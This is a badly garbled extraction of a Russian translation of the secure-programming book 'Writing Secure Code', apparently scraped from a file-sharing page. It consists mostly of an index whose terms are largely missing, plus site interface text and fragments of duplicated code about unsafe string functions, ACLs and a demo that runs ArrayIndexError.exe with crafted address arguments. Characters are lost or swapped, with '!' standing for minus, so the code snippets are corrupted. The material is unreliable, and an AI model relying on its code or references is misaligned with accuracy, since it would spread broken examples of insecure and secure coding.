Authoring and Versioning) 320
window station .
Windows Scripting Host . WSH

Windows Sockets . Winsock,
. Winsock
Winsock (Windows Sockets) 339, 399
wrappers . ,
WSH (Windows Scripting Host) 299
WTLS 102
X
XML 481
XOR 242, 243, 244, 290
XSLT (XSL Transformation) 485
XSS (crosssite scripting) . ,

Z
zeroday attack
. ,
92, 97

. RSA
74
DoS 417
DS (Denial of Service) 186
JScript 369
ping 448
UDP 447
259
SQL 344

144
328
VTable 144

144
294,
298, 355, 359, 360, 368, 480

328
144
258
89
45, 72, 92,
447
72
248
144
144
398

185
391
239, 357,
371
54, 96
144
178
232
477
Web
178
353
353
100, 169
261
92, 93, 417
IPSec 93, 94, 97
Kerberos 94
Kerberos v5 93, 96
Microsoft Passport 93, 94, 95
NTLM 93, 94, 96
665
RADIUS 93, 94, 97

71, 91, 93, 94
93, 94, 95
71, 93, 94
X.509 93, 94, 96
Windows 93, 95
.
ACE
58
. CAS

3

227
361
55

Microsoft Visual C++ 7 . CRT

226
405
74, 80, 179, 314, 321, 323,
362, 366, 412
323
323
323
178
FunLove 179
ILoveYou 179
W32.Bolzano 179
186
178
223
. GAC
85
483
79
74
487
156,
158, 168, 169

278
64
. DFD
. LSA
. SCM
6
192
100
55
. ID
. SID

202
. UID
. AppID

. DACL, . DACL
441
COM 193
ICommandWithParameters 349
IDispatch 441
IDisposable 290
IHttpModule 94
IObjectSafety 444
IPersist 441
ISecurityExample 438
ISerializable 483
IUnknown 441
UsbFileStream 472
398
HttpRequestValidationException
367
PolicyException 470
SecurityException 476
48, 151, 320

101
BadStringBuf 122
CAtlRegExp 310
666
CcryptRandom 228
CCryptRandom 228
CString 140
DataProtection 286
ErasableData 288
FileIOPermission 474
FileStream 485
FormsAuthenticationModule 94
PassportAuthenticationModule 95
Password 290
PrincipalPermission 171
RNGCryptoServiceProvider 230
SecurityPermission 474
SqlCommand 349
string 140
System.IO.File 476
UserInput 310
479
222, 250
3DES 235
DSA 236
RSA 235
235
235
235
100, 235, 237
235
236
239
100, 235
235
237
235, 237
231
234
223, 261
237
235
237

. MAC

441

441
36
44

479
277
283
36
37
288, 463
HTML 328

325
378
348
110

. NLS
139
434
92
99
(
) 296

. CSP
222
258
111, 118

. SAM

. MSL
186, 187, 188, 197, 214
199
187, 199, 201,
203, 464
222
414
154, 170
438
Assert 472, 473, 474, 476

Canonicalize 311
Clear 290
Demand 469, 473, 476
Deny 476
Dispose 290
GetRandom 230, 231
GetServerBlanket 438, 439
GetStringTypeEx 386
GetUnicodeCategory 386
HttpServerUtility.HTMLEncode 362
IclientSecurity::SetBlanket 439
Idispatch::Invoke 440
InheritanceDemand 480
Init 311
IsCallerInRole 172
Iunknown::AddRef 433
LinkDemand 476, 477
MyWin32Funtion 478
PermitOnly 476
Print 442
Release 433
Server.HTMLEncode 362
SetKey 480
Validate 311

. RPC

21
21
247, 259, 261
151, 170
437
439
83

. CLR
document.cookie 357
FileSystemObject 152
IAccessControl 437
IserverSecurity 439
PrincipalPermission 171
RegExp 309
SqlConnection 352
Utilities 230
71, 74, 78, 84, 85, 86
440

101
435
214
74
DoS 72
DREAD 79, 81, 90
STRIDE 71, 81, 101
73, 74, 77, 79, 81, 87, 88,
89
84, 85, 86
79, 92, 102
667
61, 78, 90
60

72, 92, 258
DNS 72
78
72, 92

73, 92
DNS 72
71,
92, 258
72,
75, 92

258
90
78
79
msize 141
sizeof 141
415, 425
426
422
236

. UPN
. SPN,
. SPN
357
Unicode 132
125

116
123
79

125
10
16
SYN 404
108, 112, 125, 132, 372,
378
118
109
357
668
(detached)
254

414, 431
67
244

131, 313, 321, 329
97, 98, 101, 180, 187,
197
Bypass Traverse hecking 206
185, 187, 193, 210, 213
SeAuditPrivilege 213
SeBackupPrivilege 181, 184, 192,
213
SeChangeNotifyPrivilege 186, 203,
211, 214
SeCreatePagefilePrivilege 210, 213
SeCreatePermanentPrivilege 210,
213
SeCreateTokenPrivilege 213
SeDebugPrivilege 184, 193, 210,
213, 258
SeEnableDelegationPrivilege 214
SeImpersonatePrivilege 214
SeIncreaseBasePriorityPrivilege
210, 213
SeIncreaseQuotaPrivilege 185,
193, 210, 213
SeIncreasQuotaPrivilege 187
SeLoadDriverPrivilege 185, 210,
213
SeLockMemoryPrivilege 193, 210,
213
SeMachineAccountPrivilege 193,
213
SeManageVolumePrivilege 210
SeProfileSingleProcessPrivilege 210,
213
SeRemoteShutdownPrivilege 186,
192, 214
SeRestorePrivilege 184, 213
SeSecurityPrivilege 192, 193, 210,
213
SeShutdownPrivilege 192, 210, 213
SeSyncAgentPrivilege 214
SeSystemEnvironmentPrivilege
210, 213
SeSystemProfilePrivilege 213
SeSystemtimePrivilege 193, 210,

213
SeTakeOwnershipPrivilege 186,
210, 213
SeTcbPrivilege 185, 192, 212, 213
SeUndockPrivilege 210, 214
199
181
177, 215
191
188
201
414
71
64
20
4

RegularExpressions 301
System.EnterpriseServices 287, 288
System.Net 376
System.Runtime.InteropServices
283
System.Runtime.Serialization 487
System.Security.Cryptography 243,
463
System.Security.Cryptography.X509
Certificates 254
System.Text.RegularExpressions
308, 352
System.Xml.Xsl 485
. HTTP
. IPP
470
470
EmailAlertPermission 473, 474
EnvironmentPermission 480
FileIOPermission 470, 471, 473,
485
PasswordPermission 477
PrivateKeyPermission 480
ReflectionPermission 476
RequestMinimum 470
SerializationFormatter 487
SocketPermission 474
UnmanagedCode 474
471
669
471
97, 98
304, 308,
309, 310, 330, 331, 370

162
(
) 75, 76
93
78, 84, 85, 86
80
80
,
80
79
80
79
89
170, 171, 172, 173
469
287, 467
481
document.cookie 364
innerHTML 364
innerText 362, 363
location.href 360
location.search 360
SecurityPermissionFlag.Assertion
473
155, 166
483, 487
75
348
11

. SACL
5
96
Application_OnPreSendRequest
Headers 365
onactivate 359
onclick 363
onload 359
onmouseover 359
189, 390
380

. AL
314
438
314
cookie 278
11, 125
380
4, 10
51
440
170, 174
( )
179
178,
278

. RPC
166

. UNC
180, 188
308
125
93, 171,
180
92, 100
accept 400
AddAccessAllowedACE 166
AddAccessAllowedAceEx 166
AddAccessAllowedACEEx 166
AddAccessAllowedObjectAce 166
AllocateUserPhysicalPages 193,
281
BadFunc 121
bind 391
BroadcastSystemMessage[Ex] 192
close 398
CloseFileByID 427
closesocket 401
CoInitializeSecurity 435, 437, 438
670
CompareString 381, 385

ConnectionString 352
CopyData 295
CreateFile 181, 192, 318, 320,
335, 381
CreatePrivateObjectSecurityEx 193
CreateProcessA 379
CreateProcessAsUser 187, 193, 203
CreateProcessW 379
CreateRemoteThread 184
CreateRestictedToken 201
CreateWellKnownSid 164
CryptAcquireContext 228
CryptDeriveKey 262
CryptExportKey 237
CryptGenKey 237
CryptGenRandom 225, 228, 230,
267, 271, 360
CryptGetHashParam 260
CryptImportKey 237
CryptProtecData 263
CryptProtectData 262, 263
CryptProtectMemory 280
CryptReleaseContext 228
CryptUnprotectData 262
CryptUnprotectMemory 280
DatabaseConnect 277
DebugActiveProcess 193
DoThreadWork 206
DsMakeSPN 420
EnterCriticalSection 459
eval 371
ExitWindowsEx 192
fgets 140
FoldString 387
getaddrinfo 339
GetAllSIDs 197
GetExchangeKey 239
GetFileSecurity 192
GetFileType 332
GetFullPathName 332
GetKey 236
GetKeyHandle 236
GetLongPathName 332
GetNamedSecurityInfo 164
GetPrivs 197
gets 140
GetSecurityInfo 164
GetServerVariable 132, 372
GetTickCount 455, 457
GetUser 197
GetUserNameEx 340
GetVersionEx 210
GetVolumeInformation 152
HandleInput_Strncpy2 137
HeapAlloc 276
HeapCreate 276
HeapSize 276
HttpRequest.Cookies 367
HttpRequest.Form 367
HttpRequest.QueryString 367
ImpersonateLoggedOnUser 203
inet_ntoa 140
InitializeCriticalSection 459
InitiateSystemShutdown[Ex] 192
IsBadExtension 299
IsNLSDefinedString 380, 381
IsTokenResticted 205
LCMapString 379, 381
LogonUser 95, 185, 192
LsaLookupSids 412
LsaRetrievePrivateData 189, 264,
268
LsaStorePrivateData 189, 264, 268
lstrcat 133
lstrcpy 133
lstrcpyn 133, 135
main 117, 121, 455
malloc 111, 169
Message 420
MultiByteToWideChar 131, 336,
378, 381, 382
NetJoinDomain 193
NetLocalGroupDel 193
NetUserAdd 193
OpenEventLog 192
OpenFileByID 427
OpenIDFile 427
OpenProcessToken 197
PostMessage 192
PrinterOperations 425
printf 111
PrintMessage 128
PrivilegeCheck 200
quotename 349
rand 223
ReadFileByID 427
ReadProcessMemory 193
RegisterLogonProcess 192
RegQueryValueEx 148, 150
RevertToSelf 200
RpcBindingInqAuthClient 419, 420
671
RpcBindingSetAuthInfo 417, 418,

420
RpcBindingSetAuthInfoEx 427
RpcBindingToStringBinding 430
RpcEpRegister 431
RpcImpersonateClient 427
RpcServerRegisterAuthInfo 419
RpcServerRegisterIf2 428
RpcServerRegisterIfEx 428
RpcStringBindingCompose 415
RpcStringBindingParse 430
_snprintf 138, 139
SaferComputeTokenFromLevel 207
SendMessage 192
SetEntriesInAcl 164
SetFileSecurity 159
SetNamedSecurityInfo 159, 164
SetSecurityDescriptorDacl 158
SetSecurityDescriptorGroup 158
SetSecurityDescriptorOwner 158
SetSecurityDescriptorSacl 158
SetSecurityInfo 164
setsockport 401
SetSystemPowerState 192
SetSystemTime 193
SetThreadToken 203
SetTokenInformation 192
shutdown 397
sizeof 116
sprintf 137
SprintfLogError 137
SQLBindParam 349
SQLNumParams 349
StrCat 133
strcpy 133, 135
StrCpy 133
StrCpyN 133
StringCchCat 143
StripBackslash1 455, 458
StripBackslash2 455, 458
StripBackslash3 455
strncpy 116, 135
TerminateProcess 184
ThreadFunc 206
UseFile(ctxAttacker) 424
VirtualLock 193, 281, 282
WideCharToMultiByte 378, 381, 382

WSAAccept 401, 404
99, 259
241
223
193
142
99, 259
92
249, 250

99
346
sp_executesql 350
sp_GetName 346
utl_file 348
xp_cmdshell 348
259

253
92, 100, 249
92, 99
243
244
243, 244
243

. EFS
225
37

. UML

. SDDL
320

,

Secure Windows Initia
tive, ,
,
,
.

Microsoft.
. , ,
Mic
rosoft, , .

, ,
Security Stra
tegies Microsoft,
Microsoft.

Microsoft.
Microsoft ,
Windows NT
Internet Scanner Internet Security
System. 1998 .

. ,
, ,
, ,
.
, , , , ,
, , .
,
.

Writing Secure Code PDF

Загружено:

Сведения о документе

Оригинальное название

Авторское право

Доступные форматы

Поделиться этим документом

Поделиться или встроить документ

Параметры публикации

Этот документ был вам полезен?

Это неприемлемый материал?

Авторское право:

Доступные форматы

Writing Secure Code PDF

Загружено:

Авторское право:

Доступные форматы

,

ISBN 0735617228 (.)

RPC, ActiveX- DCOM

Microsoft VBScript JScript Windows Scripting Host,

(Steve Lipner), (Eric Lippert), (Matt Lyons),

, Web, Wild Wild West (, ). . .

, Web- Windows 2000

DWORD dwRet = IsAccessAllowed(...);

DWORD dwRet = IsAccessAllowed(...);

DFD Data Flow Diagram

<RiskCO> = < > * < >

Web (7.0) Web (8.0)

Microsoft Windows 2000. 

PGP (Pretty Good Privacy) PGP 

! , , 0x45, 0x10, 0x40 

foo. Memory buf. 

foo 00401000, bar 00401040

0x10012FF84 = 0x00510048 + < > * 4

bar (0x00401000) 4198400 . 

C:\Secureco2\Chapter05>ArrayIndexError.exe 1072725967 4198400

Argamal). (David Litchfield)

BOOL GetName(char *szName)

#define ElementCount(x) (sizeof(x)/sizeof(x[0]))

void PrintLine(const char* msg)

char *strcpy( char *strDestination, const char *strSource );

if(strlen(input) < sizeof(buf))

#define strcpy Unsafe_strcpy

char *strncpy( char *strDest, const char *strSource, size_t count );

strncpy(buf, input, sizeof(buf) ! 1);

int sprintf( char *buffer, const char *format [, argument] ... );

if(sprintf(buf, " %d = %d ! %s\n",

Standart Template Library

string s1, s2;

char *gets( char *buffer );

#define MAXSTRLEN(s) (sizeof(s)/sizeof(s[0]))

/GS Visual C++ .NET

grep strcpy *.c

#define MAX_BUFF (64)

Windows NT/2000/XP. Windows 95/98/Me Windows CE ACL 

. (ACL) Windows NT/2000/

Dim fso, drv

Deny: Full Control (: )

ACL Windows 2000

BA Administrators (Builtin Administrators)

6-3. SID SDDL

Builtin Administrators Administrators (

Builtin Guests Guests ()

Builtin Users Users ()

Certificate Server Administrators Administrators 

Creator Owner ()

Service Logon User , 

Network Service ( Windows XP )

Local Service ( Windows XP )

Anonymous Logon ( ) ( Windows XP

Remote Desktop Users ( )

Network Configuration Operators ( )

Logging Users ( Windows .NET Server )

Monitoring Users ( Windows .NET Server )

ACL Active Template Library

int main(int argc, char* argv[]) {

DWORD dwFlags = KEY_ALL_ACCESS

DWORD dwFlags = FILE_ALL_ACCESS

WindowsPrincipal wp = (HttpContext.Current.User as WindowsPrincipal);

DFD Data Flow Diagram

Web (7.0) Web (8.0)

Microsoft Windows 2000.

PGP (Pretty Good Privacy) PGP

! , , 0x45, 0x10, 0x40

foo. Memory buf.

bar (0x00401000) 4198400 .

char strcpy( char strDestination, const char *strSource );

char strncpy( char strDest, const char *strSource, size_t count );

int sprintf( char buffer, const char format [, argument] ... );

char gets( char buffer );

Windows NT/2000/XP. Windows 95/98/Me Windows CE ACL

Builtin Administrators Administrators (

Certificate Server Administrators Administrators

Creator Owner ()

Service Logon User ,

6. Add Standalone Snapin ( )..

Windows .NET Server 2003

. 82, Determining Strengths

. 91. Credential Manager

(volatile char)szPwd = (volatile char )szPwd;

. 103. Character Map ,